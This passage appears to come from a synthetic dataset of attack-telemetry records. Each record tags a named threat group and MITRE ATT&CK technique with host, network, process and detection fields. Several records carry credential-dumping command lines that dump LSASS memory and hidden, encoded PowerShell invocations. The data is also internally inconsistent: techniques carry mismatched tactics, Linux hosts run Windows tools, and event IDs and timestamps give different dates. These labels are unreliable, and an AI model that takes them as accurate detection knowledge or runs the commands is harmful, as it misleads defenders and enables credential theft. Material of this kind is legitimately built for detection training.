full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-03T08:48:52.000Z","user":{"name":"azuread\\nidv74lx89sy","sid":"S-1-5-21-705660611-608982313-8993"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control","Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20260226T213021000Z_0017991","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.62.140.25","name":"DB-ORACLE-Z53KA3V9F2","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17991Mustang PandaT1003.001"},"network":{"domain":"github.com","dst_ip":"1.152.202.87","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-06-28T03:57:46.000Z","user":{"name":"svc_jyxmny7641v3","sid":"S-1-5-21-364289835-577476960-4465"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260529T175026000Z_0017993","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.252.1.55","name":"APP-WEB-WAO5RZD0TM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17993Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.147.161.152","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-15T18:24:33.000Z","user":{"name":"CORP\\vn5a1jy8wwn5","sid":"S-1-5-21-785392285-856049185-9809"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250118T072831000Z_0017995","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.65.112.169","name":"DB-ORACLE-BHBUWGQMUN","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17995FIN7T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.141.47.67","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3996 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-15T00:29:02.000Z","user":{"name":"arn:aws:iam::e9bqqkk5knbb","sid":"S-1-5-21-533521628-745853035-3025"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Collection"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260115T174538000Z_0017997","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.63.76.51","name":"DB-ORACLE-X24NCT8U7M","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17997Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.50.51.34","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2717 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-11-07T17:30:19.000Z","user":{"name":"CORP\\tsqy6ruidkke","sid":"S-1-5-21-590922309-450971342-4343"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Persistence","Execution"],"technique_id":"T1531"},"event_id":"evt_apt29_20250419T201035000Z_0017999","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.109.167.121","name":"IAM-ROLE-JS6573AXY8","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17999APT29T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.106.167.64","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1168 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-20T15:45:53.000Z","user":{"name":"svc_wh7bd75bsc4g","sid":"S-1-5-21-731834477-685267000-4641"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.